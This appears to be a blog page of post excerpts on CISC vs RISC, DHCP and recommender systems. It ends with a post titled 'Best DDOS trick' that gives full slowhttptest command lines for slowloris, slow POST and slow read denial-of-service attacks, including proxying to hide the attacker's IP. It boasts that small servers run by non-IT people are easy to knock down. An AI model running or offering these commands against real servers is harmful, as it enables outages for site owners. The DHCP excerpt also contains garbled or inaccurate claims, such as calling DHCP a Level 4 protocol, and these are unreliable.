Skip to main content

Popular posts from this blog

CISC VS RISC computers (all details)

By
CISC Introduction            The term "CISC" (complex instruction set computer or computing) refers to computers designed with a full set of computer instructions that were intended to provide needed capabilities in the most efficient way. Intel's   Pentium   microprocessors are CISC microprocessors. CISC is a   processor design   where single   instructions   can execute several low-level operations (such as a load from   memory , an arithmetic   operation , and a   memory store ) or are capable of multi-step operations or   addressing modes   within single instructions. The primary goal of CISC architecture is to complete a task in as few lines of assembly as possible. This is achieved by building processor hardware that is capable of understanding & executing a series of operations, this is where our CISC architecture introduced. The CISC approach attempts to minimize the number of instructions per program, sacrificing
Post a Comment
Read more

DHCP principle , DHCP server and client communication process

By
1. Explain with principle: the DHCP server and client communication process DHCP stands for Dynamic Host Configuration Protocol. It handles the automatic assignment of IP addresses and other configuration settings for devices on your network. DHCP automates Network and Sharing Center in your control panel. This is especially good for people who have laptops, aren't hooked up to the Internet all the time and often move from place to place with their portable devices. They can simply get a new IP address as needed without having to do it manually. DHCP is designed to make the assignment of IP addresses and other network configuration information faster and easier. DHCP is a protocol that uses Level 4 on the OSI model. It communicates using User Datagram Protocol (UDP) datagrams through UDP Port 68. DHCP works with most current and past Windows clients, and also Linux, Macintosh, and many network-capable printers. DHCP is desi
1 comment
Read more

Recommendation System literature review | Building a recommendation system

By
People have always relied on the recommendations from their peers or the advice of experts to support their decision making. Amazon.com has been using collaborative filtering for a decade to recommend products to their customers, and Netflix valued improvements to the recommender technology underlying their movie rental service at $1M via the widely published Netflix Prize [6]. Research on recommender algorithms garnered significant attention in 2006 when Netflix launched the Netflix Prize to improve the state of movie recommendation. The objective of this competition was to build a recommender algorithm that could beat their internal CineMatch algorithm in offline tests by 10%. It sparked a flurry of activity, both in academia and amongst hobbyists. The $1 M prize demonstrates the value that vendors place on accurate recommendations [8]. Recommender Systems provide the users with the suggestions of information that may be useful to the users to make their decisions on various sit
Post a Comment
Read more

Best DDOS trick you ever know | 2017 New post | enjoy

By
SlowHTTPTest is a highly configurable tool that simulates some Application
Layer Denial of Service attacks.It implements most common low-bandwidth Application
 Layer DoS attacks, such as slowloris, Slow HTTP POST, Slow Read attack(based on TCP persist timer exploit)
 by draining concurrent connections pool, as well as Apache Range Header attack by causing very significant
 memory and CPU usage on the server.Slowloris and Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, by design, requires
 requests to be completely received by the server before they are processed. If an HTTP request is not complete,
or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data.
 If the server keeps too many resources busy, this creates a denial of service.
 This tool is sending partial HTTP requests, trying to get denial of service from target HTTP server.
Installation for Debian based OS users.

apt-get install slowhttptest
Usage

slowhttptest is a great tool as it allows you to do many things. Following are few usages
Example of usage in slow message body mode

slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3
Same test with graph
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3
Example of usage in slowloris mode

slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3
Same test with graph
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3
Example of usage in slow read mode with probing through proxy

Here x.x.x.x:8080 proxy used to have website availability from IP different than yours:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver/somebigresource -p 5 -l 350 -e x.x.x.x:8080
Conclusion:

If you can run multiple DoS tools such as GoldenEye,
 hping3 on a single web server, then it is very easy to knock it down.
 There are strategies to defend against such attacks, but for a small server
where resource is limited and run by non IT people (bloggers etc.)
it quickly becomes a nightmare.In the next tutorial how to protect agains Slow HTTP Attacks.
#best_DDOS trick

Comments

Post a Comment